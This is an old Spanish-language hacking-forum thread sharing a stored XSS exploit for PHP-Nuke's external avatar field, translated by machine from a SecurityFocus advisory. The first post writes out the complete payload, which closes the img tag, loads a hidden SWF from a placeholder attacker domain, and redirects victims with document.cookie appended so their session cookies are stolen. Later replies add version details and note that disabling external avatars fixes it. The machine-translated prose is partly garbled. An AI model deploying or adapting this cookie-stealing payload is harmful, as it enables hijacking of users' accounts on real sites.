elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 22:16  


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Vulnerabilidad XSS en PHP-NUKE!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Vulnerabilidad XSS en PHP-NUKE!  (Leído 674 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Vulnerabilidad XSS en PHP-NUKE!
« en: 27 Junio 2005, 00:23 »

all version

Código:
< b>effects:</b >

todas las versiones del nuke del php



< b>solution:</b >

una filtración mejor de la selección avatar de forma externa.



en la selección avatar del perfil, uno tiene la opción de ligarse a una imagen del offsite que éste es el lugar perfecto para una hazaña.



poniendo esta línea del código en la caja cerrará la etiqueta actual del img y la ocultará.



< b>Code:</b >

"width=0 height=0 >



después de que este código nosotros ahora llame (no realmente) un de flash especialmente hecha a mano archivado en mi Website.



< b>Code:</b >

<embed src=http://yourdomain.com/redirect.swf width=0 height=0>


esto opinión el swf y el interior el swf es solamente un marco "un marco de acción" y la acción volverá a dirigir su browser a un sitio en mi página +document.cookie y en la galleta sea usernames e identificaciones de la sesión esencialmente bastante a la conexión pues quienquiera él era que es el código



< b>Code:</b >

geturl("javascript:location.replace('http://yourdomain.com/c

ookie.html?'+document.cookie)")



en cookie.html uno pudo también poner un redirigir para enviarlo de nuevo al Home Page o algo, mientras él no ve su código;)



ahora nuestro fullcode es este


< b>Code:</b >

"width=0 height=0><embed src=http://yourdomain.com/redirect.swf width=0 height=0 >



ahora en el extremo tenemos que comenzar otra etiqueta o cierre del img , que es donde pongo mi avatar



< b>Code:</b >

< img src=http://yourdomain.com/avatar.bmp



este código agregará mi avatar y el conclusión de la etiqueta del img del defecto lo cerrará.



nuestro código completo del exploit es



< b>Code:</b >

"width=0 height=0><embed src=http://yourdomain.com/redirect.swf width=0 height=0><img src=http://yourdomain.com/avatar.bmp



qué hará



1.)cerrara la img principal.

2.)abrira su swf.

3.)redireccionara a ellos a su sitio

4.)robara la cookie

5.) nuevo redirect   

¡6.)abrira un avatar!

Fuente:securityfocus

Salu2

PD: mi ingles es algo malo, sorry por la traduccion... ;)
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Re: Vulnerabilidad XSS en PHP-NUKE!
« Respuesta #1 en: 28 Junio 2005, 01:46 »

JEjejeje la traducción no se si es tuya o de un traductor on line xq deja varios fallos tipicos de traductores automáticos :P

Por cierto este fallo es un poco...... vamos que el que escribió no tiene total conocimiento del tema, ya que no todas las versiones d php-nuke son afectadas, y si hay solución simple que es desactivar los avatars externos

;) mas info:

http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=209
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Vulnerabilidad XSS en PHP-NUKE!
« Respuesta #2 en: 28 Junio 2005, 02:20 »

HI:
la traduccion es mia, solo q ayudado con un traductor de mi PC, en consecuencia, me salio medio mal pero bueno...valga la intencion ;)
en cuanto a el bug, segun securityfocus, vulnerable hasta la version 7.7 y en cuanto a la solucion:
Citar
< b>solution:</b >

una filtración mejor de la selección avatar de forma externa
q segun una traduccion simple significaria desactivar esa opcion :)

salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines